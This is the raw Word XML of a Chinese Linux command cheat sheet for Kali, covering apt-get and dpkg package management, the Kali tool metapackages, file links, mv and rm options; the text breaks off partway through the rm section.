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YaHei Mono" w:eastAsia="宋体" w:hAnsi="Microsoft YaHei Mono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53001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20F87" w:rsidRDefault="00620F87" w:rsidP="002B35D0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r w:rsidRPr="004F7BFE">
            <w:rPr>
              <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F65FED" w:rsidRPr="004F7BFE">
            <w:rPr>
              <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="004F7BFE">
            <w:rPr>
              <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc108016889" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>系统更新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0" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>文件链接：符号链接和硬链接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1" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>移动</w:t>
            </w:r>
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>重命名文件：</w:t>
            </w:r>
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mv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2" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>下载文件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3" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nmap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4" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>源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1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5" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Git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2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6" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>进行同步：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2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7" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分支操作</w:t>
            </w:r>
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>: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2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8" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>整合分支：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D0" w:rsidRDefault="00F94E9A">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="4359"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc108016899" w:history="1">
            <w:r w:rsidR="007725D0" w:rsidRPr="007E4DFB">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>other:</w:t>
            </w:r>
            <w:r w:rsidR="007725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5D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc1080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5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87" w:rsidRDefault="00F94E9A" w:rsidP="002B35D0">
          <w:pPr>
            <w:wordWrap w:val="0"/>
          </w:pPr>
          <w:r w:rsidRPr="004F7BFE">
            <w:rPr>
              <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00620F87" w:rsidRDefault="00620F87" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620F87" w:rsidRDefault="00620F87" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620F87" w:rsidRDefault="00620F87" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620F87" w:rsidRDefault="00620F87" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620F87" w:rsidRDefault="00620F87" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620F87" w:rsidRDefault="00620F87" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00730260" w:rsidRPr="009E36A3" w:rsidRDefault="00730260" w:rsidP="009E36A3">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc108016889"/>
      <w:r w:rsidRPr="009E36A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>系统更新</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00FA2C91" w:rsidRPr="009E36A3" w:rsidRDefault="00FA2C91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E36A3">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get update   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91" w:rsidRPr="009E36A3" w:rsidRDefault="00FA2C91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E36A3">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="009E36A3">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="009E36A3">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/etc/apt/sources.list</w:t>
      </w:r>
      <w:r w:rsidRPr="009E36A3">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>记载源的文件里面的源更新软件列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91" w:rsidRPr="009E36A3" w:rsidRDefault="00FA2C91" w:rsidP="00FA2C91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E36A3">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get upgrade   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730260" w:rsidRPr="009E36A3" w:rsidRDefault="00FA2C91" w:rsidP="00FA2C91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E36A3">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="009E36A3">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据更新的软件列表和已安装软件对比，更新软件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730260" w:rsidRPr="009A00BA" w:rsidRDefault="00730260" w:rsidP="009E36A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA2C91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install (Package name)    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lastRenderedPageBreak/>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安装软件包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91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remove (Package name)    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>#</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>卸载已安装的软件包</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>保留配置文档</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91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remove --purge (Package name)    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>#</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>卸载已安装的软件包</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>删除配置文档</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91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clean    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>#</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>删除所有包文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91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autoclean    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>#</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>清除那些已卸载的软件包的</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.deb</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91" w:rsidRPr="009A00BA" w:rsidRDefault="00FA2C91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dpkg -l </w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>列出所有已安装的软件包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91" w:rsidRPr="009A00BA" w:rsidRDefault="00FA2C91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>dpkg –l  | grep [name]</w:t>
      </w:r>
      <w:r w:rsidR="006D6EFE" w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D6EFE" w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查找软件包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2C91" w:rsidRPr="009A00BA" w:rsidRDefault="00FA2C91" w:rsidP="009E36A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="406"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Kali-linx-default —— </w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我们认为对渗透测试人员必不可少的工具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Kali-linux-large —— </w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为了面对一系列更广泛又不寻常的情况的渗透测试人员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730260" w:rsidRPr="009A00BA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kali-linux-everything —— </w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为了那些想拥有整个</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的人</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032425" w:rsidRDefault="00730260" w:rsidP="009E36A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install kali-linux-all —— </w:t>
      </w:r>
      <w:r w:rsidRPr="009A00BA">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="宋体" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所有工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E36A3" w:rsidRDefault="009E36A3" w:rsidP="00730260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E36A3" w:rsidRPr="009E36A3" w:rsidRDefault="009E36A3" w:rsidP="00730260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft New Tai Lue" w:hAnsi="Microsoft New Tai Lue" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E32149" w:rsidRPr="0022728A" w:rsidRDefault="00730260" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc108016890"/>
      <w:r w:rsidRPr="000D7E08">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7E08">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件链接：符号链接和硬链接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00DC1244" w:rsidRPr="00CB0A92" w:rsidRDefault="00DC124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符号链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ln -s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>新文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC1244" w:rsidRPr="00CB0A92" w:rsidRDefault="00DC124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硬链接：</w:t>
      </w:r>
      <w:r w:rsidR="005768AF" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ln </w:t>
      </w:r>
      <w:r w:rsidR="005768AF" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源文件</w:t>
      </w:r>
      <w:r w:rsidR="005768AF" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005768AF" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>新文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005768AF" w:rsidRPr="00CB0A92" w:rsidRDefault="008F2595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color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>符号链接</w:t>
      </w:r>
      <w:r w:rsidR="00F12D8D" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>创建新的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005768AF" w:rsidRPr="00CB0A92" w:rsidRDefault="008F2595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color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>硬链接</w:t>
      </w:r>
      <w:r w:rsidR="00F12D8D" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>创建的是虚拟文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00256CC4" w:rsidRPr="000D7E08" w:rsidRDefault="000D7E08" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc108016891"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A53D85" w:rsidRPr="000D7E08">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>移动|</w:t>
      </w:r>
      <w:r w:rsidR="00E134E6" w:rsidRPr="000D7E08">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重命名文件：mv</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00E01083" w:rsidRPr="00CB0A92" w:rsidRDefault="00E01083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E134E6" w:rsidRPr="0022728A" w:rsidRDefault="00F30DE4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删除文件</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30DE4" w:rsidRPr="00CB0A92" w:rsidRDefault="00F30DE4" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0" w:firstLine="36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删除询问</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30DE4" w:rsidRPr="00CB0A92" w:rsidRDefault="00F30DE4" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="36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强制删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00726583" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
